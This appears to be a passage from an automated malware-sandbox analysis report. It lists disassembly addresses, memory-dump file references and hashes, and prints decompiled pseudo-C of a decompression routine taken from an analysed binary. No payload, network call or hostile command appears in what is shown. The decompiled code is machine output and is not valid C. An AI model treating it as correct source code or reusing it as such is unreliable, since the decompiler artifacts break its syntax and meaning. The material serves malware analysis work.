                                                                                                                              0x0040637a
                                                                                                                              0x0040637d
                                                                                                                              0x00406380
                                                                                                                              0x00406383
                                                                                                                              0x00406386
                                                                                                                              0x00406389
                                                                                                                              0x0040638c
                                                                                                                              0x0040638f
                                                                                                                              0x00406392
                                                                                                                              0x004063aa
                                                                                                                              0x004063ad
                                                                                                                              0x004063b0
                                                                                                                              0x004063b3
                                                                                                                              0x004063b3
                                                                                                                              0x004063b6
                                                                                                                              0x004063ba
                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406428
                                                                                                                              0x00406428
                                                                                                                              0x0040642b
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x00000000
                                                                                                                              0x00406854
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x004069b7
                                                                                                                              0x004069bd
                                                                                                                              0x004069bf
                                                                                                                              0x004069c6
                                                                                                                              0x004069c8
                                                                                                                              0x004069cf
                                                                                                                              0x004069d3
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000
                                                                                                                              0x004069cc
                                                                                                                              0x00406819
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x0040676b

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                              • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                                              • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                              • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
